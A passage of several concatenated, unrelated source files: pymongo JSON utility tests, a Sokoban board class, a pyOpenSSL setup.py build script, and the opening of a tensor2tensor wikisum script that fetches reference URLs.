self.round_trip({"ref": DBRef("foo", ObjectId())})
# Check order.
self.assertEqual(
'{"$ref": "collection", "$id": 1, "$db": "db"}',
json_util.dumps(DBRef('collection', 1, 'db')))
def test_datetime(self):
# only millis, not micros
self.round_trip({"date": datetime.datetime(2009, 12, 9, 15,
49, 45, 191000, utc)})
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000+0000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000+0000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000+00:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000+00:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000+00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000Z"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000Z"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
# No explicit offset
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T00:00:00.000000"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
# Localtime behind UTC
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000-0800"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000000-0800"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000-08:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000000-08:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1969-12-31T16:00:00.000000-08"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
# Localtime ahead of UTC
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000+0100"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000000+0100"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000+01:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000000+01:00"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
jsn = '{"dt": { "$date" : "1970-01-01T01:00:00.000000+01"}}'
self.assertEqual(EPOCH_AWARE, json_util.loads(jsn)["dt"])
dtm = datetime.datetime(1, 1, 1, 1, 1, 1, 0, utc)
jsn = '{"dt": {"$date": -62135593139000}}'
self.assertEqual(dtm, json_util.loads(jsn)["dt"])
jsn = '{"dt": {"$date": {"$numberLong": "-62135593139000"}}}'
self.assertEqual(dtm, json_util.loads(jsn)["dt"])
# Test dumps format
pre_epoch = {"dt": datetime.datetime(1, 1, 1, 1, 1, 1, 10000, utc)}
post_epoch = {"dt": datetime.datetime(1972, 1, 1, 1, 1, 1, 10000, utc)}
self.assertEqual(
'{"dt": {"$date": -62135593138990}}',
json_util.dumps(pre_epoch))
self.assertEqual(
'{"dt": {"$date": 63075661010}}',
json_util.dumps(post_epoch))
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "-62135593138990"}}}',
json_util.dumps(pre_epoch, json_options=STRICT_JSON_OPTIONS))
self.assertEqual(
'{"dt": {"$date": "1972-01-01T01:01:01.010Z"}}',
json_util.dumps(post_epoch, json_options=STRICT_JSON_OPTIONS))
number_long_options = json_util.JSONOptions(
datetime_representation=DatetimeRepresentation.NUMBERLONG)
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "63075661010"}}}',
json_util.dumps(post_epoch, json_options=number_long_options))
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "-62135593138990"}}}',
json_util.dumps(pre_epoch, json_options=number_long_options))
# ISO8601 mode assumes naive datetimes are UTC
pre_epoch_naive = {"dt": datetime.datetime(1, 1, 1, 1, 1, 1, 10000)}
post_epoch_naive = {
"dt": datetime.datetime(1972, 1, 1, 1, 1, 1, 10000)}
self.assertEqual(
'{"dt": {"$date": {"$numberLong": "-62135593138990"}}}',
json_util.dumps(pre_epoch_naive, json_options=STRICT_JSON_OPTIONS))
self.assertEqual(
'{"dt": {"$date": "1972-01-01T01:01:01.010Z"}}',
json_util.dumps(post_epoch_naive,
json_options=STRICT_JSON_OPTIONS))
# Test tz_aware and tzinfo options
self.assertEqual(
datetime.datetime(1972, 1, 1, 1, 1, 1, 10000, utc),
json_util.loads(
'{"dt": {"$date": "1972-01-01T01:01:01.010+0000"}}')["dt"])
self.assertEqual(
datetime.datetime(1972, 1, 1, 1, 1, 1, 10000, utc),
json_util.loads(
'{"dt": {"$date": "1972-01-01T01:01:01.010+0000"}}',
json_options=json_util.JSONOptions(tz_aware=True,
tzinfo=utc))["dt"])
self.assertEqual(
datetime.datetime(1972, 1, 1, 1, 1, 1, 10000),
json_util.loads(
'{"dt": {"$date": "1972-01-01T01:01:01.010+0000"}}',
json_options=json_util.JSONOptions(tz_aware=False))["dt"])
self.round_trip(pre_epoch_naive, json_options=json_util.JSONOptions(
tz_aware=False))
# Test a non-utc timezone
pacific = FixedOffset(-8 * 60, 'US/Pacific')
aware_datetime = {"dt": datetime.datetime(2002, 10, 27, 6, 0, 0, 10000,
pacific)}
self.assertEqual(
'{"dt": {"$date": "2002-10-27T06:00:00.010-0800"}}',
json_util.dumps(aware_datetime, json_options=STRICT_JSON_OPTIONS))
self.round_trip(aware_datetime, json_options=json_util.JSONOptions(
tz_aware=True, tzinfo=pacific))
self.round_trip(aware_datetime, json_options=json_util.JSONOptions(
datetime_representation=DatetimeRepresentation.ISO8601,
tz_aware=True, tzinfo=pacific))
def test_regex_object_hook(self):
# Extended JSON format regular expression.
pat = 'a*b'
json_re = '{"$regex": "%s", "$options": "u"}' % pat
loaded = json_util.object_hook(json.loads(json_re))
self.assertTrue(isinstance(loaded, Regex))
self.assertEqual(pat, loaded.pattern)
self.assertEqual(re.U, loaded.flags)
def test_regex(self):
for regex_instance in (
re.compile("a*b", re.IGNORECASE),
Regex("a*b", re.IGNORECASE)):
res = self.round_tripped({"r": regex_instance})["r"]
self.assertEqual("a*b", res.pattern)
res = self.round_tripped({"r": Regex("a*b", re.IGNORECASE)})["r"]
self.assertEqual("a*b", res.pattern)
self.assertEqual(re.IGNORECASE, res.flags)
unicode_options = re.I|re.M|re.S|re.U|re.X
regex = re.compile("a*b", unicode_options)
res = self.round_tripped({"r": regex})["r"]
self.assertEqual(unicode_options, res.flags)
# Some tools may not add $options if no flags are set.
res = json_util.loads('{"r": {"$regex": "a*b"}}')['r']
self.assertEqual(0, res.flags)
self.assertEqual(
Regex('.*', 'ilm'),
json_util.loads(
'{"r": {"$regex": ".*", "$options": "ilm"}}')['r'])
# Check order.
self.assertEqual(
'{"$regex": ".*", "$options": "mx"}',
json_util.dumps(Regex('.*', re.M | re.X)))
self.assertEqual(
'{"$regex": ".*", "$options": "mx"}',
json_util.dumps(re.compile(b'.*', re.M | re.X)))
def test_minkey(self):
self.round_trip({"m": MinKey()})
def test_maxkey(self):
self.round_trip({"m": MaxKey()})
def test_timestamp(self):
dct = {"ts": Timestamp(4, 13)}
res = json_util.dumps(dct, default=json_util.default)
self.assertEqual('{"ts": {"$timestamp": {"t": 4, "i": 13}}}', res)
rtdct = json_util.loads(res)
self.assertEqual(dct, rtdct)
def test_uuid(self):
doc = {'uuid': uuid.UUID('f47ac10b-58cc-4372-a567-0e02b2c3d479')}
self.round_trip(doc)
self.assertEqual(
'{"uuid": {"$uuid": "f47ac10b58cc4372a5670e02b2c3d479"}}',
json_util.dumps(doc))
self.assertEqual(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "03"}}',
json_util.dumps(doc, json_options=json_util.STRICT_JSON_OPTIONS))
self.assertEqual(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "04"}}',
json_util.dumps(doc, json_options=json_util.JSONOptions(
strict_uuid=True, uuid_representation=STANDARD)))
self.assertEqual(doc, json_util.loads(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "03"}}'))
self.assertEqual(doc, json_util.loads(
'{"uuid": {"$binary": "9HrBC1jMQ3KlZw4CssPUeQ==", "$type": "04"}}'))
self.round_trip(doc, json_options=json_util.JSONOptions(
strict_uuid=True, uuid_representation=JAVA_LEGACY))
self.round_trip(doc, json_options=json_util.JSONOptions(
strict_uuid=True, uuid_representation=CSHARP_LEGACY))
def test_binary(self):
bin_type_dict = {"bin": Binary(b"\x00\x01\x02\x03\x04")}
md5_type_dict = {
"md5": Binary(b' n7\x18\xaf\t/\xd1\xd1/\x80\xca\xe7q\xcc\xac',
MD5_SUBTYPE)}
custom_type_dict = {"custom": Binary(b"hello", USER_DEFINED_SUBTYPE)}
self.round_trip(bin_type_dict)
self.round_trip(md5_type_dict)
self.round_trip(custom_type_dict)
# PYTHON-443 ensure old type formats are supported
json_bin_dump = json_util.dumps(bin_type_dict)
self.assertTrue('"$type": "00"' in json_bin_dump)
self.assertEqual(bin_type_dict,
json_util.loads('{"bin": {"$type": 0, "$binary": "AAECAwQ="}}'))
json_bin_dump = json_util.dumps(md5_type_dict)
# Check order.
self.assertEqual(
'{"md5": {"$binary": "IG43GK8JL9HRL4DK53HMrA==",'
+ ' "$type": "05"}}',
json_bin_dump)
self.assertEqual(md5_type_dict,
json_util.loads('{"md5": {"$type": 5, "$binary":'
' "IG43GK8JL9HRL4DK53HMrA=="}}'))
json_bin_dump = json_util.dumps(custom_type_dict)
self.assertTrue('"$type": "80"' in json_bin_dump)
self.assertEqual(custom_type_dict,
json_util.loads('{"custom": {"$type": 128, "$binary":'
' "aGVsbG8="}}'))
# Handle mongoexport where subtype >= 128
self.assertEqual(128,
json_util.loads('{"custom": {"$type": "ffffff80", "$binary":'
' "aGVsbG8="}}')['custom'].subtype)
self.assertEqual(255,
json_util.loads('{"custom": {"$type": "ffffffff", "$binary":'
' "aGVsbG8="}}')['custom'].subtype)
def test_code(self):
self.round_trip({"code": Code("function x() { return 1; }")})
code = Code("return z", z=2)
res = json_util.dumps(code)
self.assertEqual(code, json_util.loads(res))
# Check order.
self.assertEqual('{"$code": "return z", "$scope": {"z": 2}}', res)
no_scope = Code('function() {}')
self.assertEqual(
'{"$code": "function() {}"}', json_util.dumps(no_scope))
def test_undefined(self):
jsn = '{"name": {"$undefined": true}}'
self.assertIsNone(json_util.loads(jsn)['name'])
def test_numberlong(self):
jsn = '{"weight": {"$numberLong": "65535"}}'
self.assertEqual(json_util.loads(jsn)['weight'],
Int64(65535))
self.assertEqual(json_util.dumps({"weight": Int64(65535)}),
'{"weight": 65535}')
json_options = json_util.JSONOptions(strict_number_long=True)
self.assertEqual(json_util.dumps({"weight": Int64(65535)},
json_options=json_options),
jsn)
def test_loads_document_class(self):
# document_class dict should always work
self.assertEqual({"foo": "bar"}, json_util.loads(
'{"foo": "bar"}',
json_options=json_util.JSONOptions(document_class=dict)))
if PY26 and not HAS_SIMPLE_JSON:
self.assertRaises(
ConfigurationError, json_util.JSONOptions, document_class=SON)
else:
self.assertEqual(SON([("foo", "bar"), ("b", 1)]), json_util.loads(
'{"foo": "bar", "b": 1}',
json_options=json_util.JSONOptions(document_class=SON)))
class TestJsonUtilRoundtrip(IntegrationTest):
def test_cursor(self):
db = self.db
db.drop_collection("test")
docs = [
{'foo': [1, 2]},
{'bar': {'hello': 'world'}},
{'code': Code("function x() { return 1; }")},
{'bin': Binary(b"\x00\x01\x02\x03\x04")},
{'dbref': {'_ref': DBRef('simple',
ObjectId('509b8db456c02c5ab7e63c34'))}}
]
db.test.insert_many(docs)
reloaded_docs = json_util.loads(json_util.dumps(db.test.find()))
for doc in docs:
self.assertTrue(doc in reloaded_docs)
if __name__ == "__main__":
unittest.main()
|
the-stack_0_25941
|
class Board:
def __init__(self, boardInputFile):
# initialise board variables
self.sizeH, self.sizeV, self.nWallSquares, self.wallCoordinates, self.nBoxes, \
self.boxCoordinates, self.nstorLocations, self.storCoordinates, self.playerLoc = \
None, None, None, None, None, None, None, None, None
self.boardInputFile, self.boardGrid = boardInputFile, None
self.actions = {"u": (-1,0), "U": (-1,0), "l": (0,-1), "L": (0,-1), "d": (1,0), "D": (1,0), "r": (0,1), "R": (0,1)}
def __str__(self):
"""display class variables"""
return "sizeH: {self.sizeH}, sizeV: {self.sizeV}, nWallSquares: {self.nWallSquares}, wallCoordinates: {self.wallCoordinates}, nBoxes: {self.nBoxes}, boxCooridates: {self.boxCoordinates}, nstorLocations: {self.nstorLocations}, storCoordinates: {self.storCoordinates}, playerLoc: {self.playerLoc}'.format(self = self)"
def get_sizeH(self):
return self.sizeH
def get_sizeV(self):
return self.sizeV
def get_nWall_squares(self):
return self.nWallSquares
def get_wall_coordatinates(self):
return self.wallCoordinates
def get_nBoxes(self):
return self.nBoxes
def get_box_coordinates(self):
return self.boxCoordinates
def get_nStor_locations(self):
return self.nstorLocations
def get_stor_coordinates(self):
return self.storCoordinates
def get_player_loc(self):
return self.playerLoc
def get_board_grid(self):
return self.boardGrid
def string_to_int_list(self, stringList):
return list(map(int, stringList))
def group_coordinates(self, n, coordList):
"""newCoordList is a list of tuples. I think it's a good idea to use tuples for positions in the game board.
The initial position of sokoban is also a tuple (x,y)"""
newCoordList = []
for i in range(0, n*2, 2):
# -1 to match python array indices
newCoordList.append((coordList[i] - 1, coordList[i+1] - 1))
return newCoordList
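    # Worked example (illustrative): group_coordinates(2, [1, 1, 1, 2]) turns the
    # 1-based pairs (1, 1) and (1, 2) into the 0-based tuples [(0, 0), (0, 1)].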
def parse(self): # parse input file - sokobanXY.txt
"""input is expected to have 5 lines
line 1 is the sizeH, sizeV
line 2 is nWallSquares followed by a list wallCoordinates
line 3 is a list of boxCordinates
line 4 is a list of storCoordinates (storage location coordinates)
line 5 is the initial position of SOKOBAN"""
lineNumber = 1 # to iterate through the lines
with open(self.boardInputFile) as f:
for line in f:
l_line = line.split(' ')
if lineNumber == 1:
self.sizeH, self.sizeV = int(l_line[0]),int(l_line[1])
# print(self.sizeH,self.sizeV)
elif lineNumber == 2:
self.nWallSquares,self.wallCoordinates = int(l_line[0]),self.string_to_int_list(l_line[1: ])
self.wallCoordinates = self.group_coordinates(self.nWallSquares,self.wallCoordinates)
# print(self.nWallSquares,self.wallCoordinates)
elif lineNumber == 3:
self.nBoxes,self.boxCoordinates = int(l_line[0]),self.string_to_int_list(l_line[1: ])
self.boxCoordinates = self.group_coordinates(self.nBoxes,self.boxCoordinates)
elif lineNumber == 4:
self.nstorLocations,self.storCoordinates = int(l_line[0]),self.string_to_int_list(l_line[1: ])
self.storCoordinates = self.group_coordinates(self.nstorLocations,self.storCoordinates)
elif lineNumber == 5:
# -1 to match python array indices
self.playerLoc = (int(l_line[0])-1,int(l_line[1])-1) # (x,y) tuple
lineNumber += 1
"""While game playing, sizeH, sizeV, nWallSquares, wallCoordinates, nBoxes, nstorLocations, storCoordinates
remains fixed. The two variables which change according to the input are boxCordinates and playerLoc."""
def box_on_goal(self):
# check if any of the boxes are on any of the storage locations
flag = [i for i in self.boxCoordinates if i in self.storCoordinates]
if len(flag) > 0:
return (True, flag)
return False
def sokoban_on_goal(self):
# check if Sokoban is on goal
if self.playerLoc in self.storCoordinates:
return True
return False
def is_goal_state(self):
return sorted(self.storCoordinates) == sorted(self.boxCoordinates)
def make_board_grid(self):
if self.sizeH is None or self.sizeV is None:
return False
# self.sizeV is the number of lists in self.boardGrid and self.sizeH is the size of each list
self.boardGrid = [[' ' for i in range(self.sizeH)] for j in range(self.sizeV)]
for i in range(self.nWallSquares):
self.boardGrid[self.wallCoordinates[i][0]][self.wallCoordinates[i][1]] = '#'
for i in range(self.nstorLocations):
self.boardGrid[self.storCoordinates[i][0]][self.storCoordinates[i][1]] = '.'
for i in range(self.nBoxes):
self.boardGrid[self.boxCoordinates[i][0]][self.boxCoordinates[i][1]] = '$'
# check if any of the boxes are on any of the storage locations
result = self.box_on_goal()
if result:
stored_coordinates = result[1]
# print(stored_coordinates, '@'*10)
for i in range(len(stored_coordinates)):
self.boardGrid[stored_coordinates[i][0]][stored_coordinates[i][1]] = '*'
# check if Sokoban is on goal
if self.sokoban_on_goal():
# print('sokoban on gloal')
self.boardGrid[self.playerLoc[0]][self.playerLoc[1]] = '+'
else:
# print('sokoban not on goal')
self.boardGrid[self.playerLoc[0]][self.playerLoc[1]] = '@'
return self.boardGrid
def display_board(self):
"""
"#" - Wall
" " - Free Space
"$" - Box
"." - Goal Place
"*" - Box is placed on a goal
"@" - Sokoban
"+" - Sokoban on a goal
"""
for i in range(self.sizeV):
for j in range(self.sizeH):
print(self.boardGrid[i][j], end = '')
print('')
def is_legal_move(self, action):
x, y = None, None
if action.isupper():
# print('isupper')
x, y = self.playerLoc[0] + 2*self.actions[action][0], self.playerLoc[1] + 2*self.actions[action][1] # look two steps ahead
else:
# print('islower')
# print('test')
x, y = self.playerLoc[0] + self.actions[action][0], self.playerLoc[1] + self.actions[action][1] # look one step ahead
"""If there is not box next to the Sokobon and the input is still uppercase, then we can expect funny behavior from this code"""
coord = (x,y)
# print(coord, 'FLAG**')
# print(self.wallCoordinates)
if (coord in self.boxCoordinates) or (coord in self.wallCoordinates):
# print('1')
coord = False
if x<0 or x>self.sizeV - 1:
# print('2')
coord = False
if y<0 or y>self.sizeH - 1:
# print('3')
coord = False
# print(coord, 'FLAG##')
return coord
# if move is legal then update board
def update_board(self, action):
# print(self.is_legal_move(action), '?IS LEGAL?')
if self.is_legal_move(action):
# print(self.playerLoc, 'OLD PLAYER LOCATION')
(x,y) = (self.playerLoc[0]+self.actions[action][0], self.playerLoc[1]+self.actions[action][1])
# print(self.playerLoc)
# print(x,y)
if action.isupper() and (x,y) in self.boxCoordinates:
# print(self.boxCoordinates)
self.boxCoordinates.remove((x,y))
self.boxCoordinates.append((self.playerLoc[0]+2*self.actions[action][0], self.playerLoc[1]+2*self.actions[action][1]))
# print(self.boxCoordinates)
self.playerLoc = (x,y)
return True
return False
# def pseudo_update_board(self, action):
# assert self.is_legal_move(action)
# (x, y) = (self.playerLoc[0]+self.actions[action][0], self.playerLoc[1]+self.actions[action][1])
# both box and player coordinates change
# if action.isupper() and (x,y) in self.boxCoordinates:
# newBoxCoordinates = deepcopy(self.boxCoordinates)
# newBoxCoordinates.remove((x, y))
# newBoxCoordinates.append((self.playerLoc[0]+2*self.actions[action][0], self.playerLoc[1]+2*self.actions[action][1]))
# else:
# newBoxCoordinates = deepcopy(self.boxCoordinates)
# newPlayerCoordinates = deepcopy((x, y))
# return newPlayerCoordinates, newBoxCoordinates
def possible_moves(self):
legal_actions = []
for action in self.actions:
if self.is_legal_move(action):
(x,y) = (self.playerLoc[0]+self.actions[action][0], self.playerLoc[1]+self.actions[action][1])
if (x,y) in self.boxCoordinates and action.islower():
continue
if (x,y) not in self.boxCoordinates and action.isupper():
continue
legal_actions.append(action)
return legal_actions
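# Example usage (a minimal sketch; "sokoban01.txt" is a hypothetical input file in the
# five-line format documented in Board.parse):
if __name__ == "__main__":
    board = Board("sokoban01.txt")
    board.parse()
    board.make_board_grid()
    board.display_board()
    if board.update_board("r"):  # try to move Sokoban one cell to the right
        board.make_board_grid()
        board.display_board()
    print("legal moves:", board.possible_moves(), "solved:", board.is_goal_state())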
|
the-stack_0_25944
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) AB Strakt 2001, All rights reserved
# Copyright (C) Jean-Paul Calderone 2008-2010, All rights reserved
#
"""
Installation script for the OpenSSL module
"""
import sys, os
from distutils.core import Extension, setup
from distutils.errors import DistutilsFileError
from distutils.command.build_ext import build_ext
# XXX Deduplicate this
__version__ = '0.11'
crypto_src = ['OpenSSL/crypto/crypto.c', 'OpenSSL/crypto/x509.c',
'OpenSSL/crypto/x509name.c', 'OpenSSL/crypto/pkey.c',
'OpenSSL/crypto/x509store.c', 'OpenSSL/crypto/x509req.c',
'OpenSSL/crypto/x509ext.c', 'OpenSSL/crypto/pkcs7.c',
'OpenSSL/crypto/pkcs12.c', 'OpenSSL/crypto/netscape_spki.c',
'OpenSSL/crypto/revoked.c', 'OpenSSL/crypto/crl.c',
'OpenSSL/util.c']
crypto_dep = ['OpenSSL/crypto/crypto.h', 'OpenSSL/crypto/x509.h',
'OpenSSL/crypto/x509name.h', 'OpenSSL/crypto/pkey.h',
'OpenSSL/crypto/x509store.h', 'OpenSSL/crypto/x509req.h',
'OpenSSL/crypto/x509ext.h', 'OpenSSL/crypto/pkcs7.h',
'OpenSSL/crypto/pkcs12.h', 'OpenSSL/crypto/netscape_spki.h',
'OpenSSL/crypto/revoked.h', 'OpenSSL/crypto/crl.h',
'OpenSSL/util.h']
rand_src = ['OpenSSL/rand/rand.c', 'OpenSSL/util.c']
rand_dep = ['OpenSSL/util.h']
ssl_src = ['OpenSSL/ssl/connection.c', 'OpenSSL/ssl/context.c', 'OpenSSL/ssl/ssl.c',
'OpenSSL/util.c']
ssl_dep = ['OpenSSL/ssl/connection.h', 'OpenSSL/ssl/context.h', 'OpenSSL/ssl/ssl.h',
'OpenSSL/util.h']
IncludeDirs = None
LibraryDirs = None
# Add more platforms here when needed
if os.name == 'nt' or sys.platform == 'win32':
Libraries = ['Ws2_32']
class BuildExtension(build_ext):
"""
A custom command that semiautomatically finds dependencies required by
PyOpenSSL.
"""
user_options = (build_ext.user_options +
[("with-openssl=", None,
"directory where OpenSSL is installed")])
with_openssl = None
openssl_dlls = ()
openssl_mingw = False
def finalize_options(self):
"""
Update build options with details about OpenSSL.
"""
build_ext.finalize_options(self)
if self.with_openssl is None:
self.find_openssl()
self.find_openssl_dlls()
self.add_openssl_compile_info()
def find_openssl(self):
"""
Find OpenSSL's install directory.
"""
potentials = []
dirs = os.environ.get("PATH").split(os.pathsep)
for d in dirs:
if os.path.exists(os.path.join(d, "openssl.exe")):
ssldir, bin = os.path.split(d)
if not bin:
ssldir, bin = os.path.split(ssldir)
potentials.append(ssldir)
childdirs = os.listdir(ssldir)
if "lib" in childdirs and "include" in childdirs:
self.with_openssl = ssldir
return
if potentials:
raise DistutilsFileError(
"Only found improper OpenSSL directories: %r" % (
potentials,))
else:
raise DistutilsFileError("Could not find 'openssl.exe'")
def find_openssl_dlls(self):
"""
Find OpenSSL's shared libraries.
"""
self.openssl_dlls = []
self.find_openssl_dll("libssl32.dll", False)
if self.openssl_dlls:
self.openssl_mingw = True
else:
self.find_openssl_dll("ssleay32.dll", True)
self.find_openssl_dll("libeay32.dll", True)
# add zlib to the mix if it looks like OpenSSL
# was linked with a private copy of it
self.find_openssl_dll("zlib1.dll", False)
def find_openssl_dll(self, name, required):
"""
Find OpenSSL's shared library and its path after installation.
"""
dllpath = os.path.join(self.with_openssl, "bin", name)
if not os.path.exists(dllpath):
if required:
raise DistutilsFileError("could not find '%s'" % name)
else:
return
newpath = os.path.join(self.build_lib, "OpenSSL", name)
self.openssl_dlls.append((dllpath, newpath))
def add_openssl_compile_info(self):
"""
Set up various compile and link parameters.
"""
if self.compiler == "mingw32":
if self.openssl_mingw:
                # Library path and library names are sane when OpenSSL is
                # built with MinGW.
libdir = "lib"
libs = ["eay32", "ssl32"]
else:
libdir = ""
libs = []
                # Unlike a MinGW build, the binary installer creates atypical
                # shared library names (e.g. 'ssleay32'), so we have to use this
                # workaround and link against the import libraries directly.
if self.link_objects is None:
self.link_objects = []
for dllpath, _ in self.openssl_dlls:
dllname = os.path.basename(dllpath)
libname = os.path.splitext(dllname)[0] + ".a"
libpath = os.path.join(self.with_openssl,
"lib", "MinGW", libname)
self.link_objects.append(libpath)
else:
libdir = "lib"
libs = ["libeay32", "ssleay32"]
self.include_dirs.append(os.path.join(self.with_openssl, "include"))
self.library_dirs.append(os.path.join(self.with_openssl, libdir))
self.libraries.extend(libs)
def run(self):
"""
Build extension modules and copy shared libraries.
"""
build_ext.run(self)
for dllpath, newpath in self.openssl_dlls:
self.copy_file(dllpath, newpath)
def get_outputs(self):
"""
        Return a list of file paths built by this command.
"""
output = [pathpair[1] for pathpair in self.openssl_dlls]
output.extend(build_ext.get_outputs(self))
return output
else:
Libraries = ['ssl', 'crypto']
BuildExtension = build_ext
def mkExtension(name):
modname = 'OpenSSL.' + name
src = globals()[name.lower() + '_src']
dep = globals()[name.lower() + '_dep']
return Extension(modname, src, libraries=Libraries, depends=dep,
include_dirs=IncludeDirs, library_dirs=LibraryDirs)
setup(name='pyOpenSSL', version=__version__,
packages = ['OpenSSL'],
package_dir = {'OpenSSL': 'OpenSSL'},
ext_modules = [mkExtension('crypto'), mkExtension('rand'),
mkExtension('SSL')],
py_modules = ['OpenSSL.__init__', 'OpenSSL.tsafe',
'OpenSSL.version', 'OpenSSL.test.__init__',
'OpenSSL.test.util',
'OpenSSL.test.test_crypto',
'OpenSSL.test.test_rand',
'OpenSSL.test.test_ssl'],
zip_safe = False,
cmdclass = {"build_ext": BuildExtension},
description = 'Python wrapper module around the OpenSSL library',
author = 'Martin Sjögren, AB Strakt',
author_email = '[email protected]',
maintainer = 'Jean-Paul Calderone',
maintainer_email = '[email protected]',
url = 'http://pyopenssl.sourceforge.net/',
license = 'LGPL',
long_description = """\
High-level wrapper around a subset of the OpenSSL library, includes
* SSL.Connection objects, wrapping the methods of Python's portable
sockets
* Callbacks written in Python
* Extensive error-handling mechanism, mirroring OpenSSL's error codes
... and much more ;)"""
)
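# Example (hypothetical paths) of building on Windows against a local OpenSSL
# installation, using the custom build_ext command defined above:
#   python setup.py build_ext --with-openssl=C:\OpenSSL build
#   python setup.py install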
|
the-stack_0_25946
|
# coding=utf-8
# Copyright 2020 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Fetch reference URLs for a single group_id within a single shard_id.
See get_references_web.py to fetch URLs for all groups in within a single
shard_id.
Requires Python 3.5
pip3 install aiohttp cchardet aiodns bs4 tensorflow
"""
import datetime
import json
import math
import multiprocessing
import os
import random
import asyncio
import aiohttp
import tensorflow as tf
from tensor2tensor.data_generators.wikisum import html
from tensor2tensor.data_generators.wikisum import utils
flags = tf.flags
FLAGS = flags.FLAGS
flags.DEFINE_string("urls_dir", "gs://tensor2tensor-data/wikisum/wiki_urls/",
"Directory with wiki_urls.json files.")
flags.DEFINE_string("out_dir", None, "Directory to write reference files.")
flags.DEFINE_integer("max_parallel_requests", 50,
"Number of web requests to make in parallel.")
# Identify which URLs to fetch
flags.DEFINE_integer("shard_id", 0, "ID of URL shard to process.")
flags.DEFINE_integer("group_id", 0, "ID of group within the shard to process.")
flags.DEFINE_bool("log_samples", False,
"Whether to write out samples of the text extraction.")
flags.DEFINE_integer("log_every", 1000,
"How often to log and write out samples.")
flags.DEFINE_integer("debug_num_urls", 0,
"If >0, limits number of URLs fetched per input shard. "
"For debugging purposes only.")
WIKI_URLS_FILE = "wiki_urls.json-%05d-of-01000"
REF_SHARD_FILE = "references.tfrecords.gz-%05d-of-01000"
# Note that this program leaks memory, likely due to a bug in Python's SSL
# implementation that leaks sockets. This constant is used here and in
# get_references_web.py to limit the number of requests made by a single
# Python process. The more requests made, the more memory required due to the
# leak.
# TODO(rsepassi): Document memory impact of changing this.
URLS_PER_CLIENT = 5000
def concat_tfrecord_files(fnames, out_fname, rm_after=True):
with tf.gfile.Open(out_fname, "wb") as out_f:
for fname in fnames:
with tf.gfile.Open(fname, "rb") as in_f:
while True:
read = in_f.read(1000)
if not read:
break
out_f.write(read)
if rm_after:
tf.gfile.Remove(fname)
def shard(items, num_shards):
"""Split items into num_shards groups."""
sharded = []
num_per_shard = len(items) // num_shards
start = 0
for _ in range(num_shards):
sharded.append(items[start:start + num_per_shard])
start += num_per_shard
remainder = len(items) % num_shards
start = len(items) - remainder
for i in range(remainder):
sharded[i].append(items[start + i])
assert sum([len(fs) for fs in sharded]) == len(items)
return sharded
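# For example (a quick sanity check of the sharding logic above):
#   shard([1, 2, 3, 4, 5], 2) == [[1, 2, 5], [3, 4]]
# i.e. the remainder items are appended one-by-one to the earliest shards.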
def mp_get_text(url, page_html):
  # The parameter must not be named `html`; it would shadow the imported `html` module.
  return url, html.get_text_from_html(page_html)
def encode(s):
return bytes(s, "utf-8")
def make_example_from_ref(url, ref):
try:
url = encode(url)
ref = encode(ref)
except UnicodeEncodeError:
return None
features = {
"url":
tf.train.Feature(bytes_list=tf.train.BytesList(value=[url])),
"content":
tf.train.Feature(
bytes_list=tf.train.BytesList(value=[ref])),
}
return tf.train.Example(features=tf.train.Features(feature=features))
def tfrecord_fname(out_dir, shard_id, idx=None):
fname = os.path.join(out_dir, REF_SHARD_FILE % shard_id)
